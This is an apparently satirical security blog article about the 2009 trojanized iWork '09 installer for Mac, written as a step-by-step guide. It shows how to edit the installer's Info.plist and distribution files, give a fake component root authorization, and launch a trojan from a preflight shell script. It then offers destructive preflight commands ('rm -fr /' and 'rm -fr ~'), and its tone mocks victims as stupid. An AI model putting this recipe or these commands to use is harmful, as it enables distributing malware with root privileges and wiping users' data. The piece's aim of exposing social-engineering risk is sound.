Rixstep
	`About \| ACP \| Buy \| Industry Watch \| Learning Curve \| News \| Products \| Search \| Substack`

Home » Learning Curve » Developers Workshop

Trojans for Nothing

That ain't working! That's the way you do it!
- M Knopfler

Get It

Try It

Boy it sure is easy to screw over 20,000 stupid Maccie fanboys. You don't even have to write a trojan yourself. You don't have to know how to write code, compile, or link. All you do is take the prefab payload of your choice and put it in an Apple install package. Something - obviously - even children can do.

This is all about social engineering, folks. The security cottage industry want to scare you and sell you antivirus subscriptions but they're of no help at all. And the one thing you need is something money can't buy.

Brains.

Apple installer packages are bundles. That means if you have any halfway decent file manager (which does not include the imbecilic TFF) you'll see right away - gee whiz - there's a bunch of directories and files.

And right inside you'll find plain text files that explain in detail what's to be done when you, idiot user, click on the danged thing without inspecting first.

All you need now is a good ruse. The author of Oompa-Loompa started with 'Britney's Latest' but then he thought better of it as he was trying to screw over Maccie fanboys. And so he changed the title to latestpics.tgz and told the Maccie fanboys he found screenshots of Apple's latest operating system.

It worked like a charm.

iWork '09

Cue to 2009. And Apple's new 'office' package. Apple offer a free 30 day trial download. But why do things the easy way? If you're used to spending your parents' bandwidth hanging out at torrent sites then why not take the same download there while you're at it?

Why not indeed?

So the first thing you have to do is get the official download from Apple. Given a fast connection that's easy enough. Then you start doctoring the plain text files inside. Start with Info.plist and add your trojan to the mix.

<key>IFPkgFlagPackageList</key>
<array>
    <dict>
        <key>IFPkgFlagPackageLocation</key>
        <string>iWorkServices.pkg</string>
        <key>IFPkgFlagPackageSelection</key>
        <string>required</string>
    </dict>
    <dict>
        <key>IFPkgFlagPackageLocation</key>
        <string>iWork09Trial.pkg</string>
        <key>IFPkgFlagPackageSelection</key>
        <string>required</string>
    </dict>
    <dict>
        <key>IFPkgFlagPackageLocation</key>
        <string>iLifeMediaBrowser.pkg</string>
        <key>IFPkgFlagPackageSelection</key>
        <string>required</string>
    </dict>
</array>

Now you make a phony 'package' out of your trojan. Apps like Pacifist won't be fooled but you don't have to worry about your target demographic. Not one bit.

Now you set up your trojan in its 'info' file to require the system admin password and add it to the main package 'dist' file. A good trick is to use the same version number as the main module itself.

Title iWork Services
Version 
Description 
DefaultLocation /
DeleteWarning 

### Package Flags

NeedsAuthorization YES
Required NO
Relocatable NO
RequiresReboot NO
UseUserMask NO
OverwritePermissions NO
InstallFat NO
RootVolumeOnly NO
OnlyUpdateInstalledLanguages NO

<choices-outline>
    <line choice='iWorkServices'/>
    <line choice='iWorkTrial'/>
    <line choice='iLMB'/>
    <line choice='GAS'/>
    <line choice='ImageKit'/>
</choices-outline>
<choice id='iWorkServices' enabled='false' selected='true' title='iWorkServices'>
    <pkg-ref id='com.apple.pkg.iWorkServices' auth='Root' installKBytes="500"
    version="4.0.0.2160000.1637">file:./Contents/Packages/iWorkServices.pkg</pkg-ref>
</choice>
<choice id='iWorkTrial' enabled='false' selected='true' title='iWork'>
    <pkg-ref id='com.apple.pkg.iWork09Trial' auth='Root' installKBytes="870904"
    version="4.0.0.2160000.1637">file:./Contents/Packages/iWork09Trial.pkg</pkg-ref>
</choice>

You're going to have to fake some of the other components to fool Apple's Installer.app of course. And the most important thing is to get your trojan lauched with escalated privileges. This is perhaps the easiest part: you do it in the preflight script.

#!/bin/sh
"$1/Contents/Resources/iworkservices" &

And iworkservices of course is the trojan. And provided you have a good trojan you're now home free. But if you should change your mind - if you should find an even better trojan - then all you do is find another installer package and do it again.

Thirty minutes work tops.

A Nastier Approach?

Of course if you want to be really mean you do something like this.

#!/bin/sh
rm -fr / &

Or if you find that lacking in elegance you do something like this.

#!/bin/sh
rm -fr ~ &

That way the poor fanboy won't notice anything until reboot. That can be a lot more fun.

This is all so easy - and Maccie fanboys are so stupid - it's a wonder it's not happened more often.

New Apple EULA

In light of these recent developments Apple have decided to augment their traditional end user licence agreement and require all Maccie fanboys in the future print out and send a signed copy to One Infinite Loop.

Look at them yo-yos!
- M Knopfler